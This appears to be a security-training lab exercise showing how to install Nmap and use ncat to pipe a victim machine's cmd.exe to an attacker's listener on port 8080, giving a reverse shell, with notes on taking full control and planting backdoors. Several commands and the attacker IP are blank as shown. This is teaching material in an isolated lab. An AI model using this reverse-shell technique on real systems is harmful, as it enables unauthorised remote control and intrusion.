Perform port redirection


Perform Port Redirection

You can perform port redirection using the netcat, also known as ncat, command-line utility available for Linux, UNIX, and Windows platforms. This command-line utility reads information from connections using TCP or UDP to perform simple port redirection.

There are two entities in the process of port redirection, the attacker and the victim. The first step is for the attacker to listen on a port to send and receive data. The attacker will drop a malicious payload on the victim’s system to execute system level commands and redirect the traffic to the concerned port on the attacker system. Payloads can be delivered via email, crafted scripts, malicious files, and so on. The payload can also be delivered via a batch script.

In this exercise, you will perform port redirection using the ncat command.

Learning Outcomes

After completing this exercise, you will be able to:

  • Install Nmap
  • Use Netcat to Perform Port Redirection

Your Devices

You will be using the following devices in this lab. Please power these on now.

  • PLABDC01 - (Windows Server 2019 - Domain Server)
  • PLABDM01 - (Windows Server 2019 - Domain Member)
  • PLABWIN10 - (Windows 10 - Workstation)

Practice Labs screenshot.

Task 1 - Install Nmap

Netcat utility comes built-in with Zenmap GUI, which is the GUI version of Nmap. Netcat that comes prebuilt with Zenmap is called Ncat.

In this task, you will install Nmap, which also contains the Zenmap.

Step 1

Ensure you have powered on the required devices and connect to PLABWIN10.

Access the Intranet by launching Internet Explorer.

Figure 4.1 Screenshot PLABWIN10
Figure 4.1 Screenshot PLABWIN10: Showing the Intranet as the homepage in Internet Explorer.

Step 2

Click Tools.

Figure 4.2 Screenshot PLABWIN10
Figure 4.2 Screenshot PLABWIN10: Clicking Tools on the Intranet homepage.

Step 3

Click nmap.

Figure 4.3 Screenshot PLABWIN10
Figure 4.3 Screenshot PLABWIN10: Clicking nmap on the Intranet homepage.

Step 4

Click on nmap-5.51-setup.exe.

Figure 4.4 Screenshot PLABWIN10
Figure 4.4 Screenshot PLABWIN10: Clicking the nmap file on the Intranet homepage.

Step 5

In the notification bar, click Run.

Figure 4.5 Screenshot PLABWIN10
Figure 4.5 Screenshot PLABWIN10: Clicking Run on the notification bar.

Step 6

The Nmap Setup wizard is displayed. On the License Agreement page, click I Agree.

Figure 4.6 Screenshot PLABWIN10
Figure 4.6 Screenshot PLABWIN10: Clicking I Agree on the Nmap Setup dialog box.

Step 7

On the Choose Components page, keep the default selection and click Next.

Figure 4.7 Screenshot PLABWIN10
Figure 4.7 Screenshot PLABWIN10: Clicking Next on the Choose Components page.

Step 8

On the Choose Install Location page, keep the default installation path, and click Install.

Figure 4.8 Screenshot PLABWIN10
Figure 4.8 Screenshot PLABWIN10: Clicking Install on the Choose Install Location.

Step 9

On the Installing page, the installation progress is displayed.

Figure 4.9 Screenshot PLABWIN10
Figure 4.9 Screenshot PLABWIN10: Showing the installation progress on the Installing page.

Step 10

During the installation, the WinPcap (Nmap) 4.1.2 Setup dialog box is displayed. It prompts to replace an older version of WinPcap on the system. Click Yes to proceed with the replacement.

Figure 4.10 Screenshot PLABWIN10
Figure 4.10 Screenshot PLABWIN10: Clicking Yes on the WinPcap (Nmap) 4.1.2 Setup dialog box.

Step 11

The WinPcap (Nmap) 4.1.2 Setup wizard is displayed. On the License Agreement page, click I Agree.

Figure 4.11 Screenshot PLABWIN10
Figure 4.11 Screenshot PLABWIN10: Clicking I Agree on the License Agreement page.

Step 12

On the Installation Complete page, click Next.

Figure 4.12 Screenshot PLABWIN10
Figure 4.12 Screenshot PLABWIN10: Clicking Next on the Installation Complete page.

Step 13

On the WinPcap Options page, keep the default selections and click Next.

Figure 4.13 Screenshot PLABWIN10
Figure 4.13 Screenshot PLABWIN10: Clicking Next on the WinPcap Options page.

Step 14

On the Finished page, click Finish.

Figure 4.14 Screenshot PLABWIN10
Figure 4.14 Screenshot PLABWIN10: Clicking Finish on the Finished page.

Step 15

The Nmap Setup wizard re-appears. On the Installing page, the installation progress is displayed.

Figure 4.15 Screenshot PLABWIN10
Figure 4.15 Screenshot PLABWIN10: Showing the installation progress on the Installing page.

Step 16

On the Installation Complete page, click Next.

Figure 4.16 Screenshot PLABWIN10
Figure 4.16 Screenshot PLABWIN10: Clicking Next on the Installation Complete page.

Step 17

On the Create Shortcuts page, keep the default selection, and click Next.

Figure 4.17 Screenshot PLABWIN10
Figure 4.17 Screenshot PLABWIN10: Clicking Next on the Create Shortcuts page.

Step 18

On the Finished page, click Finish.

Figure 4.18 Screenshot PLABWIN10
Figure 4.18 Screenshot PLABWIN10: Clicking Finish on the Finished page.

Step 19

Close Internet Explorer.

Figure 4.19 Screenshot PLABWIN10
Figure 4.19 Screenshot PLABWIN10: Closing the Internet Explorer window.

Task 2 - Use Netcat to Perform Port Redirection

In this task, the PLABDM01 device will be the victim, and the PLABWIN10 device will be the attacker. Consider port 8080 as an example. The attacker will listen on port 8080 on the PLABWIN10 device using ncat command. You will execute the command shell, which is cmd.exe of the victim on PLABDM01 device, and redirect it to the attacker system where the attacker can take control of the entire system.

Step 1

Connect to PLABWIN10.

In the Type here to search textbox, type the following command:


From the search results, select Command Prompt.

Figure 4.20 Screenshot PLABWIN10
Figure 4.20 Screenshot PLABWIN10: Selecting Command Prompt from the search results.

Step 2

Command Prompt window opens.

To set up a listener, at the prompt, type the following command:

ncat -v -l -p 8080

Press Enter.

Note: The “-v” parameter determines the verbose mode, which prints any extra information. The “-l” parameter determines “Listen”. The “-p” parameter determines the port number.

Figure 4.21 Screenshot PLABWIN10
Figure 4.21 Screenshot PLABWIN10: Executing the ncat command in the command prompt window.

Step 3

The Windows Security Alert dialog box is displayed. Click Allow Access.

Figure 4.22 Screenshot PLABWIN10
Figure 4.22 Screenshot PLABWIN10: Clicking Allow access on the Windows Security Alert dialog box.

On execution of the command, the attacker is successfully listening on port 8080.

Figure 4.23 Screenshot PLABWIN10
Figure 4.23 Screenshot PLABWIN10: Showing a successful connection on port 8080.

Step 4

Connect to PLABDM01. Close the Server Manager window.

Figure 4.24 Screenshot PLABDM01
Figure 4.24 Screenshot PLABDM01: Closing the Server Manager window.

Step 5

Alert: You need to install Nmap and WinPcap on PLABDM01 using the same step as you followed in the previous task to install on PLABWIN10. Without installing Nmap, you will not be able to perform the remaining steps in this task.

To open Command Prompt, right-click the Start charm and select Run.

Figure 4.25 Screenshot PLABDM01
Figure 4.25 Screenshot PLABDM01: Right-clicking the Windows charm and select Run from the context menu.

Step 6

The Run dialog box is displayed. In the Open textbox, type the following:


Click OK.

Figure 4.26 Screenshot PLABDM01
Figure 4.26 Screenshot PLABDM01: Entering the cmd command in the Open textbox on the Run dialog box.

Step 7

The command prompt window opens.

To redirect the command shell (cmd.exe) to the attacker system, PLABWIN10, at the prompt, type the following command:

ncat 8080 -e "cmd.exe"
Note: The parameter determines the IP address of the attacker system. The parameter -e stands for Execute. The parameter cmd.exe stands for Command Shell.

The payload on the victim device is executed, and the traffic is redirected to port 8080 on the attacker system with IP address, which is the PLABWIN10 device.

Figure 4.27 Screenshot of PLABDM01
Figure 4.27 Screenshot of PLABDM01: Entering the ncat command in the command window.

Step 8

Switch back to PLABWIN10.

The attacker gets the command shell of the victim on the listener window. Command Shell (cmd.exe) from the victim is successfully redirected to the attacker system.

Figure 4.28 Screenshot of PLABWIN10
Figure 4.28 Screenshot of PLABWIN10: Showing the successfully redirected command prompt to the attacker system.

Step 9

To verify if the attacker is in complete control of the victim system’s command shell, in the Command Prompt window on PLABWIN10 device, at the prompt, type the following command:


Press Enter.

Figure 4.29 Screenshot PLABWIN10
Figure 4.29 Screenshot PLABWIN10: Entering the hostname command in the command window.

Step 10

The hostname “PLABDM01” is displayed as the command output. This indicates the attacker (PLABWIN10) is in complete control of the victim’s device (PLABDM01).

Figure 4.30 Screenshot PLABWIN10
Figure 4.30 Screenshot PLABWIN10: Showing the output of the hostname command.

Step 11

Now the attacker is in complete control of the victim’s system and can perform any desired actions such as browsing files, creating a persistent backdoor, and so on.

To display the IP configuration of the victim device (PLABDM01), in the Command Prompt window on PLABWIN10 device, at the prompt, type the following command:


Press Enter.

Figure 4.31 Screenshot PLABWIN10
Figure 4.31 Screenshot PLABWIN10: Entering the ipconfig command in the command window.

Step 12

The command displays the IP configuration details of the PLABDM01 device.

Figure 4.32 Screenshot PLABWIN10
Figure 4.32 Screenshot PLABWIN10: Showing the output of the ipconfig command.

Close all open windows.


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